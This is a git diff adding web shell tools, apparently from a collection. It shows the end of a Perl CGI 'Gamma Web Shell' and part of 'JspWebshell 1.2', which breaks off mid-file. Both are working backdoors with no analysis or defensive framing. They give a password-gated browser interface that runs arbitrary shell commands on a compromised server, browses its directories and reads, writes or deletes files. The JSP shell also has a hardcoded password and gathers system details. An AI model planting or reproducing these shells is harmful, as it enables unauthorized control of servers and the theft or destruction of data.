+  background: transparent;
+}
+
+EOT
+
+$LOGIN_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <form action="WebShell.cgi" method="POST">
+                        <table class="box">
+                            <tr><th class="box-header">Login</th></tr>
+                            [% if error %]
+                                <tr><td class="box-error">Invalid password!</td></tr>
+                            [% end %]
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <td>Password:</td>
+                                            <td><input name="password" type="password"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                            <tr>
+                                <td class="box-content">
+                                    <input class="tool" type="submit" value="OK">
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$INPUT_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <iframe name="output" src="WebShell.cgi?action=execute" width="80%" height="80%"></iframe>
+                    <br><br>
+                    <script type="text/javascript">
+                        function submit_execute() {
+                            var entry = document.forms.execute.elements['command'];
+                            if (entry.value.length > 0) {
+                                entry.select();
+                                entry.focus();
+                                document.forms.execute.elements['action'].value = 'execute';
+                                return true;
+                            }
+                            else {
+                                return false;
+                            }
+                        }
+                        function submit_browse() {
+                            document.forms.execute.elements['action'].value = 'browse';
+                        }
+                    </script>
+                    <form name="execute" action="WebShell.cgi" method="POST" target="output">
+                        <input name="action" type="hidden" value="execute">
+                        <table class="box">
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <th>Command:</th>
+                                            <td><input name="command" type="text" size="50"></td>
+                                            <td><input class="tool" type="submit" value="Execute" onClick="return submit_execute()"></td>
+                                            <td><input class="tool" type="submit" value="Browse" onClick="return submit_browse()"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$EXECUTE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if old_line %]
+            <pre class="output-command">[% old_line as html %]</pre>
+        [% end %]
+        [% if output %]
+            <pre class="output-text">[% output as html %]</pre>
+        [% end %]
+        [% if error %]
+            <pre class="output-error">[% error as html %]</pre>
+        [% end %]
+        [% if new_line %]
+            <pre class="output-command">[% new_line as html %]</pre>
+        [% end %]
+    </body>
+</html>
+EOT
+
+$BROWSE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if error %]
+            <p class="output-error">[% error as html %]</p>
+        [% end %]
+        <table class="entries" width="100%">
+            <tr class="entries-even" align="left">
+                <th colspan="6">
+                    [% for entry in directory %]<code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.path as url %]">[% entry.name as html %]/</a></code>[% end %]
+                </th>
+            </tr>
+            <tr class="entries-odd" align="left">
+                <th width="100%"><small>Name</small></th>
+                <th><small>Size</small></th>
+                <th><small>Time</small></th>
+                <th><small>Owner</small></th>
+                <th><small>Group</small></th>
+                <th><small>Mode</small></th>
+            </tr>
+            [% for entry in entries %]
+                <tr class="entries-[% if loop.entry.even %]even[% else %]odd[% end %]">
+                    <td width="100%">
+                        [% if entry.type_file %]
+                            [% if entry.type_exec %]
+                                <code class="entry-exec">[% entry.name as html %]</code>
+                            [% else %]
+                                <code class="entry-file">[% entry.name as html %]</code>
+                            [% end %]
+                        [% elif entry.type_dir %]
+                            <code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.name as url %]">[% entry.name as html %]/</a></code>
+                        [% else %]
+                            <code class="entry-other">[% entry.name as html %]</code>
+                        [% end %]
+                    </td>
+                    <td align="right">
+                        [% if entry.type_file %]
+                            <code class="entry-text">[% entry.size as html %]</code></td>
+                        [% else %]
+                        &nbsp;
+                        [% end %]
+                    </td>
+                    <td><code class="entry-text">[% entry.time as nbsp %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.user as html %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.group as html %]</code></td>
+                    <td><code class="entry-text">[% entry.mode as html %]</code></td>
+                </tr>
+            [% end %]
+        </table>
+    </body>
+</html>
+EOT
+
+
+###############################################################################
+
+package WebShell::MiniXIT;
+
+sub new {
+    my ($class) = @_;
+    return bless {}, $class;
+}
+
+sub substitute {
+    my ($self, $input, %keywords) = @_;
+    my $statements = $self->parse($input);
+    my $operation = $self->compile($statements);
+    my $output = $self->evaluate($operation, \%keywords);
+    return $output;
+}
+
+sub parse {
+    my ($self, $input) = @_;
+    my $statements = [];
+    my $start = 0;
+    while ($input =~ /(\[%\s*(.*?)\s*%\])/g) {
+        my $match_end = pos($input);
+        my $match_start = $match_end - length($1);
+        if ($start < $match_start) {
+            my $text = substr($input, $start, $match_start-$start);
+            push @$statements, { id => 'text', text => $text };
+        }
+        push @$statements, $self->parse_command($2);
+        $start = $match_end;
+    }
+    if ($start < length($input)) {
+        my $text = substr($input, $start);
+        push @$statements, { id => 'text', text => $text };
+    }
+    return $statements;
+}
+
+sub parse_command {
+    my ($self, $command) = @_;
+    if ($command =~ /^if\s+(\w+(\.\w+)*)$/) {
+        return { id => 'if', test => $1, };
+    }
+    elsif ($command =~ /^elif\s+(\w+(\.\w+)*)$/) {
+        return { id => 'elif', test => $1 };
+    }
+    elsif ($command =~ /^else$/) {
+        return { id => 'else' };
+    }
+    elsif ($command =~ /^for\s+(\w+)\s+in\s+(\w+(\.\w+)*)$/) {
+        return { id => 'for', name => $1, list => $2 };
+    }
+    elsif ($command =~ /^end$/) {
+        return { id => 'end' };
+    }
+    elsif ($command =~ /^(\w+(\.\w+)*)(\s+as\s+(\w+))$/) {
+        return { id => 'print', variable => $1, format => $4 };
+    }
+    else {
+        die "invalid command: '$command'";
+    }
+}
+
+sub compile {
+    my ($self, $statements) = @_;
+    my $operation = $self->compile_sequence($statements);
+    if (scalar(@$statements)) {
+        my $statement = shift(@$statements);
+        my $id = $statements->{id};
+        die "unexpected statement: '$id'";
+    }
+    return $operation;
+}
+
+sub compile_sequence {
+    my ($self, $statements) = @_;
+    my $operations = [];
+    while (scalar(@$statements) > 0) {
+        my $id = $statements->[0]->{id};
+        if ($id eq 'if') {
+            push @$operations, $self->compile_condition($statements);
+        }
+        elsif ($id eq 'for') {
+            push @$operations, $self->compile_loop($statements);
+        }
+        elsif ($id eq 'print' or $id eq 'text') {
+            my $statement = shift @$statements;
+            push @$operations, $statement;
+        }
+        else {
+            last;
+        }
+    }
+    return { id => 'sequence', operations => $operations };
+}
+
+sub compile_condition {
+    my ($self, $statements) = @_;
+    my $conditions = [];
+    my $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    while ($id eq 'if' or $id eq 'elif' or $id eq 'else') {
+        my $test = $id ne 'else' ? $statement->{test} : undef;
+        my $operation = $self->compile_sequence($statements);
+        push @$conditions, { test => $test, operation => $operation };
+        $statement = shift @$statements;
+        $id = defined $statement ? $statement->{id} : 'none';
+    }
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'condition', conditions => $conditions };
+}
+
+sub compile_loop {
+    my ($self, $statements) = @_;
+    my $statement = shift @$statements;
+    my $name = $statement->{name};
+    my $list = $statement->{list};
+    my $operation = $self->compile_sequence($statements);
+    $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'loop',
+        name => $name, list => $list, operation => $operation };
+}
+
+sub evaluate {
+    my ($self, $operation, $keywords) = @_;
+    $keywords->{loop} = {};
+    my $chunks = $self->evaluate_operation($operation, $keywords);
+    return join('', @$chunks);
+}
+
+sub evaluate_operation {
+    my ($self, $operation, $keywords) = @_;
+    if ($operation->{id} eq 'condition') {
+        return $self->evaluate_condition($operation->{conditions}, $keywords);
+    }
+    elsif ($operation->{id} eq 'loop') {
+        return $self->evaluate_loop($operation->{name}, $operation->{list},
+                $operation->{operation}, $keywords);
+    }
+    elsif ($operation->{id} eq 'print') {
+        return $self->evaluate_print($operation->{variable},
+                $operation->{format}, $keywords);
+    }
+    elsif ($operation->{id} eq 'sequence') {
+        my $chunks = [];
+        push @$chunks, @{$self->evaluate_operation($_, $keywords)}
+                for (@{$operation->{operations}});
+        return $chunks;
+    }
+    elsif ($operation->{id} eq 'text') {
+        return [$operation->{text}];
+    }
+}
+
+sub evaluate_condition {
+    my ($self, $conditions, $keywords) = @_;
+    for my $condition (@$conditions) {
+        my $test = $condition->{test};
+        my $value = defined $test ?
+                $self->evaluate_variable($test, $keywords) : 1;
+        return $self->evaluate_operation($condition->{operation}, $keywords)
+                    if $value;
+    }
+    return [];
+}
+
+sub evaluate_loop {
+    my ($self, $name, $list, $operation, $keywords) = @_;
+    my $values = $self->evaluate_variable($list, $keywords);
+    my $length = scalar(@$values);
+    my $index = 0;
+    my $chunks = [];
+    for my $value (@$values) {
+        $keywords->{$name} = $value;
+        $keywords->{loop}->{$name} = {
+            index => $index, number => $index+1,
+            first => $index == 0, last => $index == $length-1,
+            odd => $index % 2 == 1, even => $index % 2 == 0,
+        };
+        push @$chunks, @{$self->evaluate_operation($operation, $keywords)};
+        $index++;
+    }
+    delete $keywords->{$name};
+    delete $keywords->{loop}->{$name};
+    return $chunks;
+}
+
+sub evaluate_print {
+    my ($self, $variable, $format, $keywords) = @_;
+    my $value = $self->evaluate_variable($variable, $keywords);
+    if ($format eq 'html') {
+        for ($value) { s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; }
+    }
+    elsif ($format eq 'nbsp') {
+        for ($value) {
+            s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; s/ /&nbsp;/g;
+        }
+    }
+    elsif ($format eq 'url') {
+        $value =~ s/(\W)/sprintf('%%%02X', ord($1))/eg;
+    }
+    elsif ($format ne '') {
+        
+        die "unknown format: '$format'";
+    }
+    return [$value];
+}
+
+sub evaluate_variable {
+    my ($self, $variable, $keywords) = @_;
+    my $value = $keywords;
+    for my $name (split(/\./, $variable)) {
+        $value = $value->{$name};
+    }
+    return $value;
+}
+
+###############################################################################
+
+package WebShell::Script;
+
+use CGI;
+use CGI::Carp qw(fatalsToBrowser);
+use IPC::Open3;
+use Cwd;
+use POSIX;
+
+sub new {
+    my ($class) = @_;
+    my $self = bless { }, $class;
+    $self->initialize();
+    return $self;
+}
+
+sub query {
+    my ($self, @names) = @_;
+    my @values = ();
+    for my $name (@names) {
+        my $value = $self->{cgi}->param($name);
+        for ($value) { s/^\s+//; s/\s+$//; }
+        push @values, $value;
+    }
+    return wantarray ? @values : "@values";
+}
+
+sub initialize {
+    my ($self) = @_;
+    $self->{cgi} = new CGI;
+    $self->{cwd} = $self->{cgi}->cookie(-name => 'WebShell-cwd');
+    $self->{cwd} = cwd unless defined $self->{cwd};
+    $self->{cwd} = cwd if $WebShell::Configuration::restricted_mode;
+    $self->{login} = 0;
+    my $login = $self->{cgi}->cookie(-name => 'WebShell-login');
+    my $password = $self->query('password');
+    $self->{login} = 1
+            if crypt($WebShell::Configuration::password, $login."XX") eq $login;
+    $self->{login} = 1 if $password eq $WebShell::Configuration::password;
+}
+
+sub run {
+    my ($self) = @_;
+    return $self->login_action unless $self->{login};
+    my $action = $self->query('action');
+    $action = 'default' unless $action =~ /^\w+$/;
+    $action = $self->can($action . '_action');
+    $action = $self->can('default_action') unless defined $action;
+    $self->$action();
+}
+
+sub default_action {
+    my ($self) = @_;
+    $self->publish('INPUT');
+}
+
+sub login_action {
+    my ($self) = @_;
+    $self->publish('LOGIN', error => ($self->query('password') ne ''));
+}
+
+sub command {
+    my ($self, $command) = @_;
+    chdir($self->{cwd});
+    my $pid = open3(\*WRTH, \*RDH, \*ERRH, "/bin/sh");
+    print WRTH "$command\n";
+    close(WRTH);
+    my $output = do { local $/; <RDH> };
+    my $error = do { local $/; <ERRH> };
+    waitpid($pid, 0);
+    return ($output, $error);
+}
+
+sub forbidden_command {
+    my ($self, $command) = @_;
+    my $error = "This command is not available in the restricted mode.\n";
+    $error .= "You may only use the following commands:\n";
+    for my $ok_command (@$WebShell::Configuration::ok_commands) {
+        $error .= "    $ok_command\n";
+    }
+    return ('', $error);
+}
+
+sub cd_command {
+    my ($self, $command) = @_;
+    my $error;
+    my $directory = $1 if $command =~ /^cd\s+(\S+)$/;
+    warn "cwd: '$self->{cwd}'\n";
+    warn "command: '$command'\n";
+    warn "directory: '$directory'\n";
+    if ($directory ne '') {
+        $error = $! unless chdir($self->{cwd});
+        $error = $! unless chdir($directory);
+    }
+    $self->{cwd} = cwd;
+    return ('', $error);
+}
+
+sub execute_action {
+    my ($self) = @_;
+    my $command = $self->query('command');
+    my $user = getpwuid($>);
+    my $old_line = "[$user: $self->{cwd}]\$ $command";
+    my ($output, $error);
+    if ($command ne "") {
+        my $allow = not $WebShell::Configuration::restricted_mode;
+        for my $ok_command (@$WebShell::Configuration::ok_commands) {
+            $allow = 1 if $command eq $ok_command;
+        }
+        if ($allow) {
+            $command =~ /^(\w+)/;
+            if (my $method = $self->can("${1}_command")) {
+                ($output, $error) = $self->$method($command);
+            }
+            else {
+                ($output, $error) = $self->command($command);
+            }
+            
+        }
+        else {
+            ($output, $error) = $self->forbidden_command($command);
+        }
+    }
+    my $new_line = "[$user: $self->{cwd}]\$ " unless $command eq "";
+    $self->publish('EXECUTE',
+        old_line => $old_line, new_line => $new_line,
+        output => $output, error => $error);
+}
+
+sub browse_action {
+    my ($self) = @_;
+    my $error = "";
+    my $path = $self->query('path');
+    if ($WebShell::Configuration::restricted_mode and $path ne '') {
+        $error = "You cannot browse directories in the restricted mode.";
+        $path = "";
+    }
+    $error = $! unless chdir($self->{cwd});
+    if ($path ne '') {
+        $error = $! unless chdir($path);
+    }
+    $self->{cwd} = cwd;
+    opendir(DIR, '.');
+    my @dir = readdir(DIR);
+    closedir(DIR);
+    my @entries = ();
+    for my $name (@dir) {
+        my ($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size,
+            $atime, $mtime, $ctime, $blksize, $blocks) = stat($name);
+        my $modestr = S_ISDIR($mode) ? 'd' : '-';
+        $modestr .= ($mode & S_IRUSR) ? 'r' : '-';
+        $modestr .= ($mode & S_IWUSR) ? 'w' : '-';
+        $modestr .= ($mode & S_ISUID) ? 's' : ($mode & S_IXUSR) ? 'x' : '-';
+        $modestr .= ($mode & S_IRGRP) ? 'r' : '-';
+        $modestr .= ($mode & S_IWGRP) ? 'w' : '-';
+        $modestr .= ($mode & S_ISGID) ? 's' : ($mode & S_IXGRP) ? 'x' : '-';
+        $modestr .= ($mode & S_IROTH) ? 'r' : '-';
+        $modestr .= ($mode & S_IWOTH) ? 'w' : '-';
+        $modestr .= ($mode & S_IXOTH) ? 'x' : '-';
+        my $userstr = getpwuid($uid);
+        my $groupstr = getgrgid($gid);
+        my $sizestr = ($size < 1024) ? $size :
+                        ($size < 1024*1024) ? sprintf("%.1fk", $size/1024) :
+                        sprintf("%.1fM", $size/(1024*1024));
+        my $timestr = strftime('%H:%M %b %e %Y', localtime($mtime));
+        push @entries, {
+            name => $name,
+            type_file => S_ISREG($mode),
+            type_dir => S_ISDIR($mode),
+            type_exec => ($mode & S_IXUSR),
+            mode => $modestr,
+            user => $userstr,
+            group => $groupstr,
+            order => (S_ISDIR($mode) ? 0 : 1) . $name,
+            all_rights => (-w $name),
+            size => $sizestr,
+            time => $timestr,
+        };
+    }
+    @entries = sort { $a->{order} cmp $b->{order} } @entries;
+    my @directory = ();
+    my $path = '';
+    for my $name (split m|/|, $self->{cwd}) {
+        $path .= "$name/";
+        push @directory, {
+            name => $name,
+            path => $path,
+        };
+    }
+    @directory = ({ name => '', path => '/'}) unless @directory;
+    $self->publish('BROWSE', entries => \@entries, directory => \@directory,
+            error => $error);
+}
+
+sub publish {
+    my ($self, $template, %keywords) = @_;
+    $template = eval '$WebShell::Templates::' . $template . '_TEMPLATE';
+    my $xit = new WebShell::MiniXIT;
+    my $text = $xit->substitute($template, %keywords);
+    $self->{cgi}->url =~ m{^http://([^/]*)(.*)/[^/]*$};
+    my $domain = $1;
+    my $path = $2;
+    my $cwd_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-cwd',
+        -value => $self->{cwd},
+        -domain => $domain,
+        -path => $path,
+    );
+    my $login = "";
+    if ($self->{login}) {
+        my $salt = join '',
+                ('.', '/', 0..9, 'A'..'Z', 'a'..'z')[rand 64, rand 64];
+        $login = crypt($WebShell::Configuration::password, $salt);
+    }
+    my $login_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-login',
+        -value => $login,
+        -domain => $domain,
+        -path => $path,
+    );
+    print $self->{cgi}->header(-cookie => [$cwd_cookie, $login_cookie]);
+    print $text;
+}
+
+###############################################################################
+
+package WebShell;
+
+my $script = new WebShell::Script;
+$script->run;
+
+###############################################################################
+###############################################################################
diff --git a/php/JspWebshell 1.2.php b/php/JspWebshell 1.2.php
new file mode 100644
index 0000000..37e063a
--- /dev/null
+++ b/php/JspWebshell 1.2.php	
@@ -0,0 +1,788 @@
+<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
+<%
+/**
+ * <p>Title:JspWebshell </p>
+ *
+ * <p>Description: jspÍøÕ¾¹ÜÀí</p>
+ *
+ * <p>Copyright:¾ø¶ÔÁã¶È[B.C.T] Copyright (c) 2006</p>
+ *
+ * <p>Company: zero.cnbct.org</p>
+ *  PS:±¾³ÌĞòÊÇĞ¡µÜ´¦ÓÚĞËȤËùĞ´£¬ÈçÓĞÒÉÎÊÇëÁªÏµQQ:48124012
+ * @version 1.2
+ */
+ String path="";
+ String selfName="";
+ boolean copyfinish=false;
+%>
+<%  selfName=request.getRequestURI();
+     // String editfile="";
+        String editfile=request.getParameter("editfile");
+		if (editfile!=null)
+		{editfile=new String(editfile.getBytes("ISO8859_1"));
+		}
+	  path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+%>
+<%!    
+    String _password ="111";//ÃÜÂë
+	public String readAllFile(String filePathName) throws IOException 
+	{ 
+	FileReader fr = new FileReader(filePathName); 
+	int count = fr.read();
+	String res="";
+	while(count != -1) 
+	{ 
+	//System.out.print((char)count); 
+		res=res+(char)count;
+	count = fr.read(); 
+	if(count == 13) 
+	{ 
+	fr.skip(1); 
+	} 
+	} 
+	fr.close(); 
+	return res;
+	} 
+public void writeFile(String filePathName,String args) throws IOException 
+{ 
+FileWriter fw = new FileWriter(filePathName); 
+PrintWriter out=new PrintWriter(fw); 
+out.write(args); 
+out.println(); 
+out.flush(); 
+fw.close(); 
+out.close(); 
+} 
+public boolean createFile(String filePathName) throws IOException 
+{ 
+boolean result = false; 
+File file = new File(filePathName); 
+if(file.exists()) 
+{ 
+System.out.println("ÎļşÒѾ­´æÔÚ£¡"); 
+} 
+else 
+{ 
+file.createNewFile(); 
+result = true; 
+System.out.println("ÎļşÒѾ­´´½¨£¡"); 
+} 
+return result; 
+}
+public boolean createFolder(String fileFolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(fileFolderName); 
+if(file.exists()) 
+{ 
+//file.delete(); 
+System.out.println("Ŀ¼ÒѾ­´æÔÚ!"); 
+result = true; 
+} 
+else 
+{ 
+file.mkdir(); 
+System.out.println("Ŀ¼ÒѾ­½¨Á¢!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+}  
+
+public boolean DeleteFolder(String filefolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(filefolderName); 
+if(file.exists()) 
+{ 
+file.delete(); 
+System.out.println("Ŀ¼ÒÑɾ³ı!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+} 
+public boolean validate(String password) {
+	if (password.equals(_password)) {
+		return true;
+	} else {
+		return false;
+	}
+}
+public String HTMLEncode(String str) {
+	str = str.replaceAll(" ", "&nbsp;");
+	str = str.replaceAll("<", "&lt;");
+	str = str.replaceAll(">", "&gt;");
+	str = str.replaceAll("\r\n", "<br>");
+	
+	return str;
+}
+    public String exeCmd(String cmd) {
+	Runtime runtime = Runtime.getRuntime();
+	Process proc = null;
+	String retStr = "";
+	InputStreamReader insReader = null;
+	char[] tmpBuffer = new char[1024];
+	int nRet = 0;
+	
+	try {
+		proc = runtime.exec(cmd);
+		insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
+		while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
+			retStr += new String(tmpBuffer, 0, nRet);
+		}
+		
+		insReader.close();
+		retStr = HTMLEncode(retStr);
+	} catch (Exception e) {
+		retStr = "<font color=\"red\">ÃüÁî´íÎó\"" + cmd + "\"";
+	} finally {
+		return retStr;
+	}
+	}
+	public boolean fileCopy(String srcPath, String dstPath) {
+	boolean bRet = true;
+	
+	try {
+		FileInputStream in = new FileInputStream(new File(srcPath));
+		FileOutputStream out = new FileOutputStream(new File(dstPath));
+		byte[] buffer = new byte[1024];
+		int nBytes;
+		
+
+		while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
+			out.write(buffer, 0, nBytes);
+		}
+		
+		in.close();
+		out.close();
+	} catch (IOException e) {
+		bRet = false;
+	}	
+	
+	return bRet;
+}
+class EnvServlet
+{
+	public long timeUse=0;
+	public Hashtable htParam=new Hashtable();
+	private Hashtable htShowMsg=new Hashtable();
+	public void setHashtable()
+	{
+		Properties me=System.getProperties();
+		Enumeration em=me.propertyNames();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=me.getProperty(strKey);
+			htParam.put(strKey,strValue);
+		}
+	}	
+	public void getHashtable(String strQuery)
+	{
+		Enumeration em=htParam.keys();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=new String();
+			if(strKey.indexOf(strQuery,0)>=0)
+			{
+				strValue=(String)htParam.get(strKey);
+				htShowMsg.put(strKey,strValue);
+			}
+		}
+	}
+	public String queryHashtable(String strKey)
+	{
+		strKey=(String)htParam.get(strKey);
+		return strKey;
+	}
+/*	public long test_int()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		while(i<3000000)i++;
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}
+	public long test_sqrt()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		double db=(double)new Random().nextInt(1000);
+		while(i<200000){db=Math.sqrt(db);i++;}
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}*/
+}
+%>
+<%
+	EnvServlet env=new EnvServlet();
+	env.setHashtable();
+	//String action=new String(" ");
+	//String act=new String("action");
+	//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
+%>
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>JspWebShell By ¾ø¶ÔÁã¶È</title>
+<style>
+body {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	background-color: #666666;
+}
+A {
+	COLOR: black; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: black; TEXT-DECORATION: underline; none: 
+}
+td {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	color: #000000;
+}
+
+input.textbox {
+	border: black solid 1;
+	font-size: 12px;
+	height: 18px;
+}
+
+input.button {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	border: black solid 1;
+}
+
+td.datarows {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	height: 25px;
+	color: #000000;
+}
+.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
+textarea {
+border: black solid 1;
+}
+.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
+.table1 {BORDER:gray 0px ridge;}
+.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
+.tr1 {BACKGROUND-color:gray }
+</style>
+<script language="JavaScript" type="text/JavaScript">
+<!--
+function MM_reloadPage(init) {  //reloads the window if Nav4 resized
+  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
+    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
+  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
+}
+MM_reloadPage(true);
+//-->
+</script>
+</head>
+<body bgcolor="#666666">
+<%
+//session.setMaxInactiveInterval(_sessionOutTime * 60);
+String password=request.getParameter("password");
+if (password == null && session.getAttribute("password") == null) {
+
+%>
+
+<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px"> 
+  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
+    <tr> 
+      <td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
+          <tr> 
+            <TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell 
+              version 1.2¹ÜÀíµÇ¼ :::...</b></font></TD>
+            <TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By 
+              ¾ø¶ÔÁã¶È</FONT></TD>
+          </tr>
+          <form name="bctform" method="post">
+            <tr bgcolor="#999999"> 
+              <td height="30" colspan="2" align="center" class="td2"> 
+                <input name="password" type="password" class="textbox" id="Textbox" /> 
+                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" /> 
+              </td>
+            </tr>
+          </form>
+        </TABLE></td>
+    </tr>
+  </TABLE>
+</div>
+<%
+
+	} else {
+	
+	if (session.getAttribute("password") == null) {
+		
+		if (validate(password) == false) {
+			out.println("<div align=\"center\"><font color=\"red\"><li>ÃÜÂë´íÎó</font></div>");
+			out.close();
+			return;
+		}
+		
+		session.setAttribute("password", password);
+	} else {
+		password = (String)session.getAttribute("password");
+	}
+%>
+	<%
+		File tmpFile = null;
+		String delfile="";
+		String delfile1="";
+		String editpath="";
+		delfile1=request.getParameter("delfile");
+		editpath=request.getParameter("filepath");
+		if (delfile1!=null)
+		{delfile=new String(delfile1.getBytes("ISO8859_1"));
+		}
+        if ( delfile1!= null) {
+        //  out.print(delfile);
+	    	tmpFile = new File(delfile);
+		if (! tmpFile.delete()) {
+			out.print( "<font color=\"red\">ɾ³ıʧ°Ü</font><br>\n");
+			}
+			}
+%>
+  <%String editfilecontent=null;
+       String editfilecontent1=request.getParameter("content");
+	   // out.println(editfilecontent1);
+		//String save=request.getParameter("save");
+	   if (editfilecontent1!=null)
+	   {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
+          //   out.print(editfile);
+			//out.print(editfilecontent);
+            if (editfile!=null&editfilecontent!=null)
+			{try {writeFile(editfile,editfilecontent);}
+			 catch (Exception e) {out.print("Ğ´Èëʧ°Ü");}
+			 out.print("Ğ´Èë³É¹¦");
+			}
+			%>
+<%request.setCharacterEncoding("GBK");%>
+<%//String editfile=request.getParameter("editfile");
+//out.print(editfile);
+if (request.getParameter("jsptz")!=null)
+{%>
+<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2"> 
+  <CENTER>
+  <table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+  <tr> 
+      <td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>·şÎñÆ÷Ïà¹Ø²ÎÊı</strong></font>      
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+          <tr bgcolor="#999999" height="22">
+		  <td width="130" bgcolor="#999999">&nbsp;·şÎñÆ÷Ãû</td>
+            <td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷²Ù×÷ϵͳ</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%> 
+              <%=env.queryHashtable("sun.os.patch.level")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷²Ù×÷ϵͳÀàĞÍ</td>
+            <td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
